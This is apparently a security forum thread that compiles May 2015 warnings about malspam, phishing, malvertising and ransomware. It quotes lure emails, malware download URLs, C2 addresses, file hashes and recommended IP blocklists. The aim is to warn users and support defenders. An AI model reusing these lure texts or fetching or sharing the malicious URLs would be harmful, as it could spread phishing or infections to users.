7May 2015 : XY12469DMM.doc - Current Virus total detections: 0/56*
The malicious macro in this example tries to connect to pastebin .com/download.php?i=VTd9HVkz where it downloads an encrypted/encoded text file which in turn is used to contact http ://91.226.93.14/stat/get.php and downloads test.exe (VirusTotal**). This also attempts to download an image from savepic .org/7260406.jpg... why or what purpose this is used for except to try to persuade you that the file is innocent. This image is of an orthodox Jewish man, but yesterday’s malicious word docs tried to use an image of the Russian President Vladimir Vladimirovich Putin... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4279be7398ee5c46b325364b58212d2428a27aee000323c64deeac453f14a5da/analysis/1430990065/
** https://www.virustotal.com/en/file/c36837a6f4a8a839fb2f5fe87650aede43713177814761d7c5156bb9b89a73d2/analysis/1430990250/
... Behavioural information
TCP connections
46.36.217.227: https://www.virustotal.com/en/ip-address/46.36.217.227/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
91.226.93.14: https://www.virustotal.com/en/ip-address/91.226.93.14/information/
___
Fake 'invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/your-invoice-from-price-company-01537833-rep-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'Your invoice from Price & Company 01537833 REP' pretending to come from focus@ price-regency .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... This email has what appears to be a genuine word doc or Excel XLS spreadsheet attached which is malformed and contains a macro script virus... The email looks like:
Attached is your invoice 01537833.
7 May 2015 : 01537833.doc - Current Virus total detections: 2/52*
... which tries to connect to hmcomercial .com.br/75/47.exe ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d4d135b5c5839942bfb3fdf3c608ab4424f0e005483adddc436f524068716903/analysis/1430990459/
___
Fake 'Payslip' SPAM - PDF malware
- http://myonlinesecurity.co.uk/payslip-for-period-end-date-30042015-fake-pdf-malware/
7 May 2015 - "'Payslip for period end date 30/04/2015' pretending to come from noreply@ fermanagh .gov .uk with a zip attachment is another one from the current bot runs... The email when it arrives working looks like:
Dear administrator
Please find attached your payslip for period end 30/04/2015
Payroll Section
————
7 May 2015: payslip.zip: Extracts to: payslip.exe
Current Virus total detections: 0/58 (virus Total currently down so will update later)
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake 'Credit Note' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/credit-note-scspackaging-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'Credit Note' pretending to come from sales@ scspackaging .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Thank you very much for getting in touch.
Please find credit attached.
Apologies for any inconvenience, we hope this covers everything.
If you have any queries please don’t hesitate to get in touch.
Thank you
Regards
SCS
7 May 2015: Credit Note.doc ... -same- malware payload as today’s earlier malicious word docs 'Your invoice from Price & Company 01537833 REP – word doc or excel xls spreadsheet malware'* although the copy I saw used a -different- download location. There are numerous different download locations around... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/your-invoice-from-price-company-01537833-rep-word-doc-or-excel-xls-spreadsheet-malware/
___
Lloyds Bank Spam
- http://threattrack.tumblr.com/post/118356242953/lloyds-bank-spam
May 7, 2015 - "Subjects Seen:
Lloyds Bank - Pendeford Securities - Please Read Action Required/PI Documents/ Region code East 2/ 7262921/
Typical e-mail details:
Please find attached our document pack for the above customer. Once completed please return via email to the below address.
If you have any queries relating to the above feel free to contact us at
MN2Lloydsbanking@ lloydsbanking .com
Malicious File Name and MD5:
ReportonTitle770415.1Final 1.exe (8178ad46a72c44cdb9a6146f0952d5bf)
Tagged: Lloyds Bank, Upatre
___
Malvertising strikes dozens of top adult sites
- https://blog.malwarebytes.org/malvertising-2/2015/05/malvertising-strikes-on-dozens-of-top-adult-sites/
May 7, 2015 - "We have been observing a very large malvertising campaign affecting dozens of top adult sites over the past week. All these attacks have a common element, a Flash based infection via a rogue advertiser abusing the AdXpansion ad network... this particular campaign is quite noticeable due to the number of sites affected and their popularity. According to stats from SimilarWeb .com, these adult portals account for a combined 250+ million monthly visits.
drtuber .com 60.2 M
nuvid .com 46.5 M
hardsextube .com 43.7 M
justporno .tv 32.5 M
alphaporno .com 24.9 M
eroprofile .com 18 M
pornerbros .com 16.6 M
pichunter .com 6.6 M
iceporn .com 6.4 M
tubewolf .com 6.2 M
winporn .com 5.4 M ...
As we have seen lately, more and more malvertising attacks are self-contained. The same fraudulent Flash advert is also used as the exploit, making it much more streamlined and sometimes hard to pinpoint. The advert displaying sexual enhancement drugs, is loaded with malicious code that will immediately attempt to exploit the visitor, regardless of whether they click on the ad or not... The bogus advert can exploit Flash Player up until version 17.0.0.134, released less than two months ago... The malware payload may vary but could result in multiple different malicious binaries dropped via a Neutrino-like EK (credit Kafeine*)..."
* http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html
"... As spotted by FireEye on 2015-04-17**, Angler EK is now taking advantage of a vulnerability patched with the last version of Flash Player (17.0.0.169)..."
** https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html
Apr 18 2015
___
Rombertik malware ...
- https://blog.malwarebytes.org/security-threat/2015/05/whats-important-about-rombertik/
May 6, 2015 - "... What’s mostly uncommon about Rombertik is that, unlike much of the other malware in circulation today, Rombertik will -trash- the user’s hard drive if certain hash values don’t line up. This is an uncommon practice in malware, although it does happen on occasion. Recall that the malware involved in the Sony Pictures hack of last year did the same thing, and even earlier attacks were happening against banks in South Korea that did the same thing... Unlike those examples though, Rombertik doesn’t appear to be a state-sponsored malware. Instead, it mostly appears in phishing messages and other spam which will fall into the hands of everyday users. Much like everyday malware, most of Rombertik’s actions aren’t too unique. When looking at the picture depicting Rombertik’s course of action*, its noted the malware performs a lot of the same techniques seen in malware over the last several years; things like creating “excessive activity” to blow up procmon logs or having the binary overwrite itself in memory with unpacked code (Run PE) isn’t anything new in the world of malware.
* https://blogs.cisco.com/wp-content/uploads/compromise-flow-wm.png
... In the case of Rombertik, the malware writes random bytes to memory many times before proceeding execution. This would be something that conventional malware sandboxes don’t account for, and therefore would be considered an anti-sandbox technique... For the full report on Rombertik by Talos, click here**."
** http://blogs.cisco.com/security/talos/rombertik
May 4, 2015 - "... Rombertik is a complex piece of malware with several layers of obfuscation and anti-analysis functionality that is ultimately designed to steal user data. Good security practices, such as making sure anti-virus software is installed and kept up-to-date, -not- clicking on attachments from unknown senders, and ensuring robust security policies are in place for email (such as blocking certain attachment types) can go a long way when it comes to protecting users. However, a defense in depth approach that covers the entire attack continuum can help identify malware and assist in remediation in the event that an attacker finds a way to evade detection initially..."
- https://atlas.arbor.net/briefs/
May 7, 2015 - "... Rombertik was the subject of recent reports. This new version employs numerous methods to -evade- sandbox forensics, including an attempt to overwrite the MBR if it believes it is being analyzed in memory. A recent spearphishing campaign against Taiwanese government officials targeted the victims through a common consumer grade messaging application. Regardless of the types of applications in use (enterprise or BYOD), attackers will leverage any possible vector in their attempts to fulfill campaign objectives..."
:fear::fear: :mad:
AplusWebMaster
2015-05-08, 12:43
FYI...
Fake 'Scanned tickets' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/scanned-tickets-word-doc-or-excel-xls-spreadsheet-malware/
8 May 2015 - "'Scanned tickets' pretending to come from Rebecca De Mulder <milestoneholdings@ yahoo .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Afternoon
Attached are the tickets you have requested
Kinds Regards kath
Milestone Holdings
Tel: 01676 541133
Mob: 07976 440015
08 May 2015: scan0079.xls - Current Virus total detections: 3/56*
Automatic analysis has not detected any network activity or malware download so far. Once we have full details of other analysis we will update this.
Update: manual analysis gives http ://wesleychristianschool .org/43/83.exe as the download location
(VirusTotal**). Note with these there will be -numerous- different macros with different download locations all giving the -same- actual malware... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/01d2cee3230121d5ae785c2c0d96144db0402039d30e5e548196c8327473b7f7/analysis/1431073205/
** https://www.virustotal.com/en/file/53dc289f44cc3c6d4609a8a757fe62a0782b6ee5e2a274140a2d850a53a2287b/analysis/1431074156/
... Behavioural information
TCP connections
62.152.36.90: https://www.virustotal.com/en/ip-address/62.152.36.90/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
wesleychristianschool .org: 192.185.166.117: https://www.virustotal.com/en/ip-address/192.185.166.117/information/
___
PayPal Phish ...
- https://blog.malwarebytes.org/fraud-scam/2015/05/your-account-paypal-has-been-limited-phishing-scam/
May 8, 2015 - "There’s a “Your account has been limited” email in circulation, targeting users of PayPal. The mail, which (bizarrely) claims to come from servicesATapple .com, claims that the account needs to be unlocked by confirming the potential victim’s identity.
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/ppl1.jpg
The Email reads as follows:
Your Account PayPal Has Been Limited !
Dear Customer,
To get back into your PayPal account, you'll need to confirm your identity.
It's easy:
Click on the link below or copy and past the link into your browser.
Confirm that you're the owner of the account, and then follow the instructions.
The link leads to a .ma URL, which is the country code for Morocco:
confirm-identity(dot)me(dot)ma
The page is currently offline, but there’s a collection of related websites with similar URLs as per this VirusTotal page*.
* 72.55.165.59: https://www.virustotal.com/cs/ip-address/72.55.165.59/information/
Some of these have been taken down, a few are still live so it’s probable there are multiple email campaigns leading to each of the -fake- sites... In -all- cases, delete the mail and don’t click on the URLs which aren’t official PayPal domains or secured with https (occasionally phish pages use https, but they’re pretty rare)..."
___
Word Macro Spam
- http://threattrack.tumblr.com/post/118453126458/word-macro-spam
May 8, 2015 - "Subjects Seen:
#3zLT5
#LvaX6
ID: MrYSk
Typical e-mail details:
Sent from my ipad
Malicious File Name and MD5:
99HOaFRD.doc (6162c6b0abc8cab50b9d7c55d71e08fe)
Tagged: Word doc Macro, Upatre, iPad, dyre
___
Ad Network Compromised, Users Victimized by Nuclear Exploit Kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/ad-network-compromised-users-victimized-by-nuclear-exploit-kit/
May 7, 2015 - "MadAdsMedia, a US-based web advertising network, was -compromised- by cybercriminals to lead the visitors of sites that use their advertising platform to Adobe Flash exploits delivered by the Nuclear Exploit Kit. Up to 12,500 users per day may have been affected by this threat; three countries account for more than half of the hits: Japan, the United States, and Australia.
This attack was first seen in April, although at relatively low traffic levels. The number of users at risk grew significantly as May started, with the peak of 12,500 daily affected users reached on May 2:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/05/MadAds1.jpg
We initially thought that this was another case of malvertising, but later found evidence that said otherwise. Normal malvertising attacks involve the -redirect- being triggered from the advertisement payload registered by the attacker. This was not evident in the MadAdsMedia case... We found in our investigation that the URL didn’t always serve JavaScript code, and instead would sometimes redirect to the Nuclear Exploit Kit server... This led us to the conclusion that the server used by the ad network to save the JavaScript library was compromised to redirect website visitors to the exploit kit. MadAdsMedia serves a variety of websites globally, and several of the affected sites appear to be related to anime and manga. The Flash exploits in use are targeting CVE-2015-0359*, a vulnerability that was patched only in April of this year. Some users may still be running -older- versions of Flash and thus be at risk. The Flash exploits are being delivered by the Nuclear Exploit Kit, a kit that has been constantly updated to add new Flash exploits and has been tied to crypto-ransomware... Attacks like these highlight the importance for ad networks to keep their infrastructure secure from attacks. Making sure that web servers and applications are secure will help ensure the protection of the business and their customers. End users, on the other hand, are advised to keep popular web plugins up to date. Users with the latest versions of Adobe Flash would not have been at risk. Monthly Adobe updates are released at approximately the same time as Patch Tuesday (the second Tuesday of each month); this would be a good time for users to perform what is, in effect, preventive maintenance on their machines..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0359
Last revised: 04/22/2015 - "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x -before- 17.0.0.169 on Windows and OS X and -before- 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors..."
:fear::fear: :mad:
AplusWebMaster
2015-05-11, 15:52
FYI...
Fake 'Fax' SPAM - PDF malware
- http://myonlinesecurity.co.uk/anne-levy-patio-furniture-levy-port-st-lucie-fake-pdf-malware/
11 May 2015 - "'Patio furniture- Levy, Port St. Lucie' coming from random email addresses and random names with a zip attachment is another one from the current bot runs... The email looks like:
Attention:
Please see attached letter. I await your immediate response.
Thank you,
Anne Levy
11 May 2015: ONE example PutkTvy9XAf.zip: Extracts to: Fax_wqe32rq2vgwb_data.exe
Current Virus total detections: 0/56*. All the attachments have random names and extract to random names and numbers but all appear to start with -fax- so far today. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3f25cd91ae475fa68ca913dedf7648e56ea9b5f97cf1dbd69feaf5b1c9b431be/analysis/1431341851/
___
Fake 'Water Line' SPAM – PDF malware
- http://myonlinesecurity.co.uk/huntsman-way-water-line-fake-pdf-malware/
11 May 2015 "'Huntsman Way Water Line' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
HI,
Was a pleasure talking with you again this morning.
Find attached the quote you requested for your bid.
Please contact us if you have any questions.
Have a great day!
Respectfully,
Steve Geissen
Estimating / Outside Sales (Beaumont / Lufkin)
O:(409)813-2796 F:(409)813-2623 M:(409)363-3038 ...
11 May 2015: 8fs77CjN2XXh.zip: Extracts to: Invoice_w543245345_4323.exe
Current Virus total detections: 3/56* . Another version as these appear to be random sizes and contents N3dQrS51H469.zip extracts to Fax_11112436_4323.exe
Current Virus total detections: 8/57** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8eaf6470216985909ceb03446974f96cd5b518d7a79e894dbb5735776f2ff73a/analysis/1431355859/
** https://www.virustotal.com/en/file/67f2feb4026bdea28095b0c73fe91e833e4e2557f9796b087f759ad9a87d13d6/analysis/1431358936/
... Behavioural information
TCP connections
104.130.28.231: https://www.virustotal.com/en/ip-address/104.130.28.231/information/
91.211.17.201: https://www.virustotal.com/en/ip-address/91.211.17.201/information/
67.219.166.113: https://www.virustotal.com/en/ip-address/67.219.166.113/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'Payment details' SPAM - doc malware attachment
- http://blog.dynamoo.com/2015/05/malware-spam-payment-details-and-copy.html
11 May 2015 - "... using the analysis of an anonymous source (thank you)..
From: Kristina Preston [Kerry.df@ qslp .com]
Date: 11 May 2015 at 12:56
Subject: Payment details and copy of purchase [TU9012PM-UKY]
Dear [redacted]
On 08/05/15 you have requested full payment details and copy of purchase. Please refer to document in the attachment.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Kristina Preston
Brewin Dolphin
The names and references -change- between different versions, but in all cases there is a malicious DOC file attached. This DOC has an unusual structure in that it is a some sort of MIME file containing a mixture of HTML and Base64-encoded segments... source has analysed that this downloads a VBS file from Pastebin... which then downloads some sort of .NET binary from 91.226.93[.]14:8080/stat/get.php (Sobis, Russia). This binary has a detection rate of 2/56* and according to automated analysis tools... it communicates with:
46.36.217.227 (FastVPS, Estonia)
It also drops a DLL with an MD5 of f0d261147d2696253ab893af3d125f53 and a detection rate of 1/56**.
Recommended blocklist:
46.36.217.227
91.226.93.14 "
* https://www.virustotal.com/en/file/ad5da98892fd9ce4b15adbce4645228a8bc63ab5aa7f7361f3e853caf43e1098/analysis/1431349548/
... Behavioural information
TCP connections
46.36.217.227: https://www.virustotal.com/en/ip-address/46.36.217.227/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
** https://www.virustotal.com/en/file/565366fc6d1cce5fb5e0d31e2726d6ebc6d48f2f5d2dcc7c7bf3f1e675b1def8/analysis/
- http://blog.mxlab.eu/2015/05/11/fake-email-payment-details-and-copy-of-purchase-random-contains-mailicious-word-file/
May 11, 2015
- https://www.virustotal.com/en/file/4fd4a17600edead52b9a0d401b467e233f52aaba68ec577998a11ac29eb66762/analysis/
Detection ratio: 1/56
Analysis date: 2015-05-11 14:33:59 UTC
___
Fake 'Fiserv' SPAM - zip malware attached
- http://blog.mxlab.eu/2015/05/11/fake-email-fiserv-secure-email-notification-8715217-contains-upatre-trojan/
May 11, 2015 - "... intercepted a new trojan distribution campaign by email with the subject 'Fiserv Secure Email Notification – 8715217'. This email is sent from the -spoofed- address “Fiserv Secure Notification <secure.notification@ fiserv .com>” and has the following body:
You have received a secure message
Read your secure message by opening the attachment, SecureFile.zip.
The attached file contains the encrypted message that you have received.
To read the encrypted message, complete the following steps:
– Double-click the encrypted message file attachment to download the file to your computer.
– Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
To access from a mobile device, forward this message to mobile@ res .fiserv .com to receive a mobile login URL.
If you have concerns about the validity of this message, please contact the sender directly. For questions about secure e-mail encryption service, please contact technical support at 888.362.9972.
2000-2015 Fiserv Secure Systems, Inc. All rights reserved.
The attached file SecureFile8715217.zip contains the 37 kB large file SecureFile.exe. The trojan is known as Virus.Win32.Heur.c, W32/Upatre.E3.gen!Eldorado, UDS:DangerousObject.Multi.Generic or Trojan.Win32.Qudamah.Gen.5. At the time of writing, 8 of the 56 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/a14ee4362b3fa3c6c0836d036563ff9d42b95269b3a9de29a9dd999c7caa45f6/analysis/
File name: SecureFile.vxe
Detection ratio: 9/56
Analysis date: 2015-05-11 15:01:00 UTC
___
"Breaking Bad" themed ransomware - Fake PDF attachment ...
- http://net-security.org/malware_news.php?id=3035
11.05.2015 - "A new type of ransomware is targeting Australian users, and its creators have decided to have some fun and express their love for the popular US TV show 'Breaking Bad' while trying to 'earn' some money:
> http://www.net-security.org/images/articles/lospollos-11052015.jpg
It encrypts the usual assortment of file types - images, documents, audio and video files, archive and database files - with a random Advanced Encryption Standard (AES) key, which is then encrypted with an RSA public key. 'The malware arrives through a malicious zip archive, which uses the name of a major courier firm in its file name. This zip archive contains a malicious file called PENALTY.VBS, which when executed, downloads the crypto ransomware onto the victim’s computer. The threat also downloads and opens a legitimate .pdf file to trick users into thinking that the initial zip archive was not a malicious file' Symantec researchers shared:
> http://www.symantec.com/connect/app#!/blogs/breaking-bad-themed-los-pollos-hermanos-crypto-ransomware-found-wild
.
>> http://www.symantec.com/security_response/writeup.jsp?docid=2015-050723-5132-99
The crooks ask for the -ransom- to be paid in Bitcoin, and instruct victims on how to do this via a legitimate YouTube tutorial... the malware can be pretty damaging. The best protection against this type of destructive malicious software is to back up important files regularly."
>> http://www.symantec.com/connect/app#!/blogs/ransomware-how-stay-safe
___
Xerox Fax Spam
- http://threattrack.tumblr.com/post/118696783723/xerox-fax-spam
May 11, 2015 - "Subjects Seen:
You have received a new fax
Typical e-mail details:
You have received fax from XEROX23685428 at <email domain>
Scan date: Mon, 11 May 2015 15:40:57 +0100
Number of page(s): 29
Resolution: 400x400 DPI
Name: Fax3516091
Malicious File Name and MD5:
IncomingFax.exe (c6c2d72f2b36e854f51ff92680969918)
Tagged: Xerox, Upatre
___
Compromised .gov redirects to Apple ID Phish
- https://blog.malwarebytes.org/fraud-scam/2015/05/compromised-gov-redirected-to-apple-id-phish/
May 11 2015 - "... a .gov .vn URL which was redirecting to a -phishing- expedition for Apple IDs... the email which sported a particularly French flavour:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/applephish1.jpg
... victim was sent to: skintesting(dot)com(dot)au/components/com_mailto/views/sent/tmpl/auth/
which looked like yet another compromised domain, asking for Apple login credentials:
> https://blog.malwarebytes.org/wp-content/uploads/2015/05/applephish3.jpg
... A .gov site is always going to be a juicy target for scammers so it’s crucial Admins keep everything patched and up to date – tracking back to where and how an attacker got in can be a long, arduous process. As for Apple ID owners, always -verify- you’re on the correct page before entering login details. Unless you specifically asked Apple to send you a link for some reason (a password reset, for example) then you should -avoid- random URLs sent your way*..."
* https://www.apple.com/uk/support/appleid/security/
skintesting .com .au: 192.185.109.233: https://www.virustotal.com/en/ip-address/192.185.109.233/information/
:fear::fear: :mad:
AplusWebMaster
2015-05-12, 13:25
FYI...
Fake 'invoice' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/copy-of-your-123-reg-invoice-123-015309323-word-doc-or-excel-xls-spreadsheet-malware/
12 May 2015 - "'Copy of your 123-reg invoice ( 123-015309323 )' pretending to come from no-reply@ 123-reg .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Copy-of-your-123-reg-invoice-123-015309323-.png
12 May 2015 : 123-reg-invoice.doc - Current Virus total detections: 5/57*
... this particular macro downloads greenmchina .com/432/77.exe (virus Total**) other macros will download the same malware from other locations... Other download locations so far are:
http ://hydrocapital .com/432/77.exe
http ://fosteringmemories .com/432/77.exe
http ://k-insects .com/432/77.exe
http ://andrewachsen .com/432/77.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4baef401edc96a5e777724dbfded6ad5536f5badc88ec8f9c42c8dc35d201ba8/analysis/1431420411/
** https://www.virustotal.com/en/file/8169820dc63b4f72564524f78dd73baad3dcb6f05518d55a01e08d268b612da7/analysis/1431420983/
... Behavioural information
TCP connections
37.143.15.116: https://www.virustotal.com/en/ip-address/37.143.15.116/information/
5.178.43.49: https://www.virustotal.com/en/ip-address/5.178.43.49/information/
- http://blog.dynamoo.com/2015/05/malware-spam-copy-of-your-123-reg.html
12 May 2015
"... Recommended blocklist:
37.143.15.116
62.152.36.90
89.28.83.228
185.15.185.201 "
___
Fake 'contract' SPAM - PDF malware
- http://myonlinesecurity.co.uk/city-of-port-arthur-storm-sewer-project-fake-pdf-malware/
12 May 2015 - "'CITY OF PORT Arthur – STORM SEWER Project' coming from random names and random email addrrsses with a zip attachment is another one from the current bot runs... The email looks like:
Please see attachment for contract. Please sign and return.
Thanks
Fred Stepp – Office Manager
McInnis Construction, Inc.,
675 South 4th Street
Silsbee, Texas 77656
email: fred@ mcinnisprojects .com
Phone: 409-385-5767
Fax: 409-385-2483
12 May 2015: m7Tfq4u1cS5i.zip: Extracts to: contract_DGSASGQ34G_erwr.exe
Current Virus total detections: 23/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/686802c0e504ee17b8c225ef1fa195d76e84ba9483e1eb5e5f540430ab119705/analysis/1431424842/
___
Fake 'Outstanding Invoices' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html
12 May 2015 - "This -spam- comes with random senders and reference numbers, but in all cases includes a malicious attachment:
From: Debbie Barrett
Date: 12 May 2015 at 11:14
Subject: ATTN: Outstanding Invoices - [4697E0] [April|May]
Dear anthony,
Kindly find attached our reminder and copy of the relevant invoices.
Looking forward to receive your prompt payment and thank you in advance.
Kind regards
The attachment name combines the recipient's email address with the -fake- reference number, e.g. barry_51DDAF.xls which isn't actually an Excel file at all, but a multipart MIME file. Payload Security's Hybrid Analysis tools* manages to analyse it though, showing several steps in the infection chain. First a VBScript is downloaded from pastebin[.]com/download.php?i=5K5YLjVu
Secondly, that VBScript then downloads a file from 92.63.88[.]87:8080/bt/get.php (MWTV, Latvia) which is saved as crypted.120.exe, this has a detection rate of 2/57.**
This component then connects to 46.36.217.227 (FastVPS, Estonia) and according to this Malwr report drops a Dridex DLL with a detection rate of 3/56***. There are several different attachments... Recommended blocklist:
92.63.88.0/24
46.36.217.227 "
* https://www.hybrid-analysis.com/sample/ec833c13eea0555cfc2c8b8824537b6ce0deef609b0d8fb04f37894a746c472c?environmentId=4
** https://www.virustotal.com/en/file/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8/analysis/1431431603/
*** https://www.virustotal.com/en/file/97d53bbcf96e42d9fba1e82c55a8a55cb3026cb7ade847630b608e6f0ee72772/analysis/1431432524/
___
Australian Tax Office Spam
- http://threattrack.tumblr.com/post/118777840043/australian-tax-office-spam
May 12, 2015 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 12/05/2015
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 0736.22 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Iris Simmons,
Tax Refund Department
Australian Taxation Office
Malicious File Name and MD5:
ATO_TAX_724491.exe (3da854cd500c3cb5b86df19e151503cc)
Tagged: ATO, Upatre
:fear::fear: :mad:
AplusWebMaster
2015-05-13, 13:59
FYI...
Fake 'WhatsApp audio letter' SPAM – mp3 malware
- http://myonlinesecurity.co.uk/whatsapp-you-just-accepted-an-audio-letter-v8p-fake-mp3-malware/
13 May 2015 - "'You just accepted an audio letter! v8p' pretending to come from WhatsApp with a zip attachment is another one from the current bot runs... The email looks like:
Savion Dale
13 May 2015: 72katheryne.zip : Extracts to: montag.mp3 _______________________________________.exe
Current Virus total detections:15/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper mp3 file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/93aa2f7eda535abb50198e4e2fe474c27d696ece9972c38c8f7db24146d1f55b/analysis/1431496654/
___
Fake 'PAYMENT ACCOUNT DETAILS' SPAM - malware
- http://myonlinesecurity.co.uk/payment-account-details-confirmation-of-67000-malware/
13 May 2015 - "'PAYMENT ACCOUNT DETAILS CONFIRMATION OF $67,000' pretending to come from jimmy cliff <jimmycliff2015@ hotmail .com> (email headers show that this does appear to be coming via Hotmail, so we have to assume a hacked/compromised Hotmail account) with a zip attachment is another one from the current bot runs... The email looks like:
Dear Sir
Please, confirm your bank details in your invoice before we proceed with
your payment to avoid mistakes that can lead to delay.
Best Regards,
Afraa Shaymaa Maloof
PURHASING MANAGER
mediondirect INT.
708 N VALLEY ST STE C
ANAHEIM CA 92801-3837
Todays Date: BANK DETAILS.zip (1,288,813 bytes): Extracts to: PO#0001BH04_20_15.zip
... which in turn extracts to PO#0001BH04_20_15.exe - Current Virus total detections: 21/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d3cce03fae7985afb9e66352bf16cd97adece416834844a2e6f6034b182ab5b9/analysis/1431502495/
___
Fake 'Invoice #00044105' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-00044105-from-deluxebase-ltd-word-doc-or-excel-xls-spreadsheet-malware/
13 May 2015 - "'Invoice #00044105; From Deluxebase Ltd' pretending to come from Anna <anna@ deluxebase .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Hello
Thank you for your order which has been dispatched, please find an invoice for the goods attached.
Please contact us immediately if you are unable to detach or download your Invoice.
As a valued customer we look forward to your continued business.
Regards
Accounts Department
Deluxebase Ltd ...
13 May 2015 : ESale.doc - Current Virus total detections: 5/55*
... which downloads sundialcompass .com/58/39.exe (VirusTotal**) other versions of these macros will deliver a download form other locations. They will all be the same malware.
Other download locations so far discovered are:
http ://fundacionsidom .com .ar/58/39.exe | http ://cartermccrary .com/58/39.exe |
http ://clin .cn/58/39.exe ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/98ac338c46ce0e4686a3b4e75f39f29ad4e4903cfba3d41cd0402a0f9e5f51e8/analysis/1431505840/
** https://www.virustotal.com/en/file/d958ceed05ea399726d081aa48eeea7e3af164dba39ed8c26e7376343189b385/analysis/1431506138/
... Behavioural information
TCP connections
37.143.15.116: https://www.virustotal.com/en/ip-address/37.143.15.116/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
___
Fake 'INVOICE No.517-01' SPAM - PDF malware
- http://myonlinesecurity.co.uk/invoice-no-517-01-for-work-at-crystal-beach-fake-pdf-malware/
13 May 2015 - "'INVOICE No. 517-01 FOR WORK AT CRYSTAL BEACH' coming from random names and random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
in the attachment
13 May 2015: OX6qoPp98h48.zip: Extracts to: scan_32r23rf234gt34_3424ef.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2050280dd1341b559f9dfea0dc9f0598e7fb69e123dee3bb6eb7698160f63787/analysis/1431513162/
___
Fake 'Financial info' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/financial-information-word-doc-or-excel-xls-spreadsheet-malware/
13 May 2015 - "An email with the subject of 'Financial information' or 'Important information' or 'Need your attention, Important notice' coming from random names and random email addresses with a malicious word doc or Excel XLS spreadsheet attachment that is named after the email recipient is another one from the current bot runs... The email looks like:
Good morning
Please find attached a remittance advice, relating to a payment made to you.
Many thanks
Regards,
Madeline Mosley
Seniour Finance Assistant
-Or-
Good Afternoon,
We have received a payment from you for the sum of £ 670. Please would you provide me with a remittance, in order for me to reconcile the statement.
I will be sending you a statement of outstanding invoices tomorrow, the total amount outstanding is £ 1515 less the £3254.00 received making a total outstanding of £ 845. We would very much appreciate settlement of this.
